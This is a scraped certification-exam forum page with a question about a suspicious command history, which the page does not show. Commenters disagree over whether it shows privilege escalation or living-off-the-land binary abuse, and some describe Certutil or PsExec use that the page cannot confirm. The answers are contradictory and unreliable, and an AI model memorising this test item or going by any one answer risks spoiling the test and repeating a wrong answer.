A security analyst is reviewing the following system command history on a computer that was recently utilized in a larger attack on the corporate infrastructure:
Which of the following best describes what the analyst has discovered?
A.
A successful privilege escalation attack by a local user
B.
A user determining what level of permissions the user has
C.
A systems administrator performing routine maintenance
D.
An attempt to utilize living-off-the-land binaries
These commands indicate that the user was trying to find ways to elevate their privileges using the same account or another account with higher privileges.
While they did leverage a tool that already existed on the system, the fact that they showed they elevated their privilege at the end there implies it's A. Privilege escalation
I believe this is a privilege escalation attempt. It looks like the attacker began as domain\local user but then escalated to nt authority\sytem. Nt authority\system is a local machine’s built-in service accounts which runs everything from the log-in screen to most of the high-privilege background services. In my research, I read that these accounts should be whitelisted to a degree that no one can install malicious services on them.
D. An attempt to Utilize living-off-the-land binaries.
Living-off-the-land binaries (LOLBins) are legitimate tools that are already present on the system, such as Powershell, WMIC, or Certutil, that can be exploited by attackers to perform malicious activities. In this case, the attacker used the Certutil tool to download and decode a malicious file from a remote server, and then executed it using Powershell. This technique can help the attacker bypass detection and deliver malware without relying on specific code or files.
To throw in more light, PsExec is a lightweight command-line tool for executing processes on remote systems. It can be used by attackers to run malicious processes on compromised systems. Other examples of these dual-use tools which have been used for “living off the land” attacks are, Windows Sysinternals, NETSH, or SC tools.
The provided command history indicates an attempt to utilize living-off-the-land binaries (LOLBins). Living-off-the-land binaries are legitimate, built-in system tools or binaries that attackers abuse for malicious purposes. In this case, the command history shows the use of common system tools like "whoami," "net," and "tasklist" to gather information or execute commands.
upvoted 2 times
...
This section is not available anymore. Please use the main Exam Page.SY0-601 Exam Questions
Log in to ExamTopics
Sign in:
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.
Upvoting a comment with a selected answer will also increase the vote count towards that answer by one.
So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.
johnabayot
Highly Voted 1 year, 5 months agomrface33
Most Recent 1 year, 2 months agoJking1989
1 year, 3 months agoTM78
1 year, 4 months agoPayu1994
1 year, 4 months agojohnabayot
1 year, 5 months agoYomzie
1 year, 5 months agoHs1208
1 year, 5 months ago